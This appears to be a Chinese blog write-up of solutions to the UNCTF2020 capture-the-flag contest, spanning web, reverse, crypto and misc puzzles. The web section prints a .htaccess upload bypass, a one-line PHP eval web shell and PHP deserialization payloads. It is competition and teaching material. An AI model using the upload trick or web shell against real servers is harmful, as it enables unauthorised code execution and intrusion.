UNCTF2020部分wp

Web

1.easy_ssrf

2.俄罗斯方块人大战奥特曼

查看源代码,发现有一个压缩包

下载下来

发现有

打开即可得到flag

image

3.easy_upload

解题过程:

上传题,测试不能上传php,phtml等,发现数据库是apache,尝试上传.htaccess文件,文件内容

<pre>AddType application/x-httpd-p
hp .jpg</pre>

上传hp.jpg

内容

<pre><?=eval($_POST[satan]);</pre>

连接蚁剑得到flag

4.easyunserialize

解题过程:

反序列化字符串逃逸,构造payload

<pre>challengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy"};;;</pre>

得出flag

5.ezphp

解题过程:

原题,构造payload

<pre>data=a:2:{s:8:"username";b:1;s:8:"password";b:1;} </pre>

得到flag

Pwn

YLBNB

使用pwntools

Reverse

recheckin

解题过程:

打开ida搜welcome,按f5

image

得到伪代码,可知与str2比较,双击跳转

双击,后面的按r转换成字符

Crypto

1.wing

附件的图片是一些符号,一点都看不懂,提示说是office,于是打开office
image

里面的字体里有一个叫

的字体,发现里面的字体正好是这些符号,于是一个个对比过去,把附件里的符号全部输入到office,然后转换为宋体
image
image

得到flag

2.鞍山大法官


看到营养想到培根加密
将o替换位A,t替换为B
解密即可


3.easy_rsa


4.简单的RSA


得到d



5.快乐数学

第一小问找规律即可






第二小问



第三小问

\sqrt[2020]{2020!}-\frac{1}{112}-\frac{28\pi}{3}

md5加密即可

Misc

1.mouse_click

下载脚本https://github.com/WangYihang/UsbMiceDataHacker,下载后放到wireshark根目录,附件也放进去,管理员运行cmd,cd到wireshark根目录,输入

<pre>python2 UsbMiceDataHacker.py mouse_click.pcapng LEFT</pre>

然后就自动绘制出了鼠标运行轨迹

image

得出flag

2.倒影

010editor打开文件,底部有一串base64字符,解码后得到一串hex码,但是得不出东西,根据题目名称提示,将hex码倒序输出,再使用010editor生成文件得出压缩包,有密码,爆破六位数密码后得出flag

3.你能破解我的密码吗

shadow是linux /etc/shadow文件,文本打开,有一行guguguguji
image

后面接了md5,根据shadow文件格式,md5解密结果123456即密码.

4.阴阳人编码

打开文件,格式是一个没有见过的编码,但是很熟悉,和Ook编码很像,尝试一下,把“就这.”换成“Ook.”,“就这¿”换成“Ook?”,“不会吧!”换成“Ook!”。然后解密,得到flag
image

5.EZIMAGE

使用imgmagick里面的montage拼图
<pre>montage unctf.png -tile 1515 -geometry +0+0 flag.png</pre>
然后得到这个


然后gaps拼图
<pre>gaps --image=flag.png --size=60 --save</pre>
得到flag

6.零

打开txt,是一段字母,尝试词频分析没有用,全选复制到wps,发现有多处留白,百度得知是零宽度字符串隐写,http://330k.github.io/misc_tools/unicode_steganography.html
进入这个网站,解密得到flag

image

7.网络深处1

解题过程:解压文件,有一段拨号音,不知道要干什么,尝试解压里面的压缩包,发现要密码,猜测电话号码就是密码,11位数字密码爆破


解压压缩包,里面有一段音频,Audacity打开

看不出什么东西,查看频谱图

https://tuppers-formula.ovh/
进入网站,把长串数字复制粘贴
image

得到flag

8.baba_is_you


有一个b站地址
flag在评论区


9.撕毁的二维码

10.被删除的flag

放BT5里
cat flag



直接得到flag


11.爷的历险记


解摩丝码
拿到屠龙刀



打了第一个boss





做异或 开第二个宝箱

购买hint2
修改hint2提示的那个文件



打倒第三个boss
拿到flag

12.躲猫猫

后缀改成zip解压, 打开/xl/sharedstring.xml

里面一串base64解码即可
image

13.YLB's CAPTCHA - 签到题

阴间签到,验证码纯眼看,连对十次就可以得到flag了。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。
禁止转载,如需转载请通过简信或评论联系作者。

推荐阅读更多精彩内容

  • 0x01 签到 flag:flag{buu_ctf} 0x02 金仨胖 gif文件,拖入stegsolve,得到三...
    Du1in9阅读 10,789评论 2 4
  • edit:逆向的2和4感觉推的没问题但是提交不对,就很难受 edit的edit:看了大佬WP,果然思路错了,瘫平 ...
    ylylhl阅读 3,290评论 0 0
  • 密码学 1.凯撒将军 本题主要考察了对简单唯一密码的理解。由题目所给出的凯撒大帝,可以联想到凯撒密码,又提示了of...
    彩色的白_67ca阅读 4,798评论 2 0
  • ①欢迎来到地狱 原题链接:http://www.shiyanbar.com/ctf/2010 下载文件,解压 打开...
    _Blank_阅读 4,284评论 0 0
  • RE re-150 upx脱壳后,程序逻辑十分清晰,但出题人少了一位校验,所以造成题目多解,官网爆破 直接写脚本 ...
    2mpossible阅读 7,317评论 3 1